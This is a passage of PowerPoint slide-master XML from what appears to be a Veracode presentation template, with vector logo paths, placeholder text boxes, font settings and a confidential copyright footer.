                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105728" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140970" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187643" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187643" y="0"/>
                    <a:pt x="138113" y="128588"/>
                    <a:pt x="123825" y="164783"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="720090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="624840" y="252413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="169545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="591503" y="162878"/>
                    <a:pt x="627698" y="141923"/>
                    <a:pt x="627698" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627698" y="61913"/>
                    <a:pt x="618173" y="38100"/>
                    <a:pt x="601980" y="22860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584835" y="6668"/>
                    <a:pt x="562928" y="0"/>
                    <a:pt x="530543" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="444818" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444818" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678180" y="263843"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="678180" y="263843"/>
                    <a:pt x="690563" y="231458"/>
                    <a:pt x="699135" y="209550"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="785813" y="209550"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="794385" y="231458"/>
                    <a:pt x="806768" y="263843"/>
                    <a:pt x="806768" y="263843"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="865823" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765810" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720090" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="515303" y="125730"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501015" y="125730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501015" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528638" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561023" y="52388"/>
                    <a:pt x="572453" y="70485"/>
                    <a:pt x="572453" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572453" y="97155"/>
                    <a:pt x="572453" y="125730"/>
                    <a:pt x="515303" y="125730"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="717233" y="158115"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="726758" y="132398"/>
                    <a:pt x="738188" y="99060"/>
                    <a:pt x="741998" y="86678"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="766763" y="158115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717233" y="158115"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="183" name="Freeform: Shape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{125B7AEF-09A0-4FEE-4182-E4345C5307E5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156886" y="1766793"/>
              <a:ext cx="151447" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY3" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY4" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY7" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY8" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY9" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY10" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY11" fmla="*/ 52388 h 262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447" h="262890">
                  <a:moveTo>
                    <a:pt x="151448" y="52388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="52388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="184" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD979DD-FE6C-6A04-6153-6FE8D91DF765}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334879" y="1762031"/>
              <a:ext cx="263842" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 195263 w 263842"/>
                <a:gd name="connsiteY1" fmla="*/ 82868 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 199073 w 263842"/>
                <a:gd name="connsiteY2" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 203835 w 263842"/>
                <a:gd name="connsiteY3" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 263842 w 263842"/>
                <a:gd name="connsiteY4" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 255270 w 263842"/>
                <a:gd name="connsiteY5" fmla="*/ 71438 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 215265 w 263842"/>
                <a:gd name="connsiteY6" fmla="*/ 25718 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 263842"/>
                <a:gd name="connsiteY8" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY9" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 254317 w 263842"/>
                <a:gd name="connsiteY10" fmla="*/ 202883 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 262890 w 263842"/>
                <a:gd name="connsiteY11" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 197167 w 263842"/>
                <a:gd name="connsiteY12" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 194310 w 263842"/>
                <a:gd name="connsiteY13" fmla="*/ 191453 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY14" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 55245 w 263842"/>
                <a:gd name="connsiteY15" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY16" fmla="*/ 52388 h 272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3842" h="272415">
                  <a:moveTo>
                    <a:pt x="135255" y="52388"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169545" y="52388"/>
                    <a:pt x="188595" y="74295"/>
                    <a:pt x="195263" y="82868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199073" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203835" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263842" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="71438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248602" y="60008"/>
                    <a:pt x="239077" y="42863"/>
                    <a:pt x="215265" y="25718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183832" y="2858"/>
                    <a:pt x="148590" y="0"/>
                    <a:pt x="135255" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60960" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210503"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="135255" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184785" y="272415"/>
                    <a:pt x="229552" y="246698"/>
                    <a:pt x="254317" y="202883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="262890" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197167" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194310" y="191453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179070" y="209550"/>
                    <a:pt x="157163" y="220028"/>
                    <a:pt x="135255" y="220028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92392" y="220028"/>
                    <a:pt x="55245" y="180975"/>
                    <a:pt x="55245" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54292" y="89535"/>
                    <a:pt x="90488" y="52388"/>
                    <a:pt x="135255" y="52388"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="185" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D514460-3E07-FC69-7091-4894019CAAD4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5986389" y="1766793"/>
              <a:ext cx="148589" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY2" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY3" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 93345 w 148589"/>
                <a:gd name="connsiteY4" fmla="*/ 132398 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY7" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY8" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 115252 w 148589"/>
                <a:gd name="connsiteY9" fmla="*/ 224790 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 148590 w 148589"/>
                <a:gd name="connsiteY10" fmla="*/ 131445 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 121920 w 148589"/>
                <a:gd name="connsiteY11" fmla="*/ 47625 h 262890"/>
                <a:gd name="connsiteX12" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 262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89" h="262890">
                  <a:moveTo>
                    <a:pt x="14288" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14288" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77152" y="52388"/>
                    <a:pt x="93345" y="102870"/>
                    <a:pt x="93345" y="132398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93345" y="202883"/>
                    <a:pt x="37147" y="210503"/>
                    <a:pt x="13335" y="210503"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13335" y="262890"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57150" y="262890"/>
                    <a:pt x="89535" y="250508"/>
                    <a:pt x="115252" y="224790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135255" y="204788"/>
                    <a:pt x="148590" y="167640"/>
                    <a:pt x="148590" y="131445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148590" y="102870"/>
                    <a:pt x="138113" y="71438"/>
                    <a:pt x="121920" y="47625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98108" y="16193"/>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="14288" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Picture Placeholder 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819A42C7-121C-F958-9F15-B6A996A56597}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697133" y="386955"/>
            <a:ext cx="2217737" cy="1065212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Customer logo goes here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244852150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_Light_BLANK">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0095D893-F526-F932-B2E6-5FA4DB36B3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C65C85C8-41FA-5E37-80FF-2F6B627AC023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404620752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_Light_Title_Bod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chemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>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tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26608C53-E4E6-1280-0DE8-7BF3E6F451BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396875" y="1411705"/>
            <a:ext cx="11472863" cy="4330283"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203"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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCC5FC35-DAF3-FC15-82B7-B747A76CA514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="307640"/>
            <a:ext cx="11472725" cy="520642"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{526D070C-603D-7F27-393B-26BEACE8D85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26648" y="0"/>
            <a:ext cx="4571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2"/>
              </a:solidFill>
              <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3289865073"/>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1_Content_Light_Title_Center">
    <p:bg>
      <p:bgPr>
        <a:gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="34000">
              <a:schemeClr val="tx1"/>
            </a:gs>
            <a:gs pos="97000">
              <a:schemeClr val="tx2"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="5400000" scaled="1"/>
          <a:tileRect/>
        </a:gra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rgbClr val="415869"/>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rgbClr val="415869"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
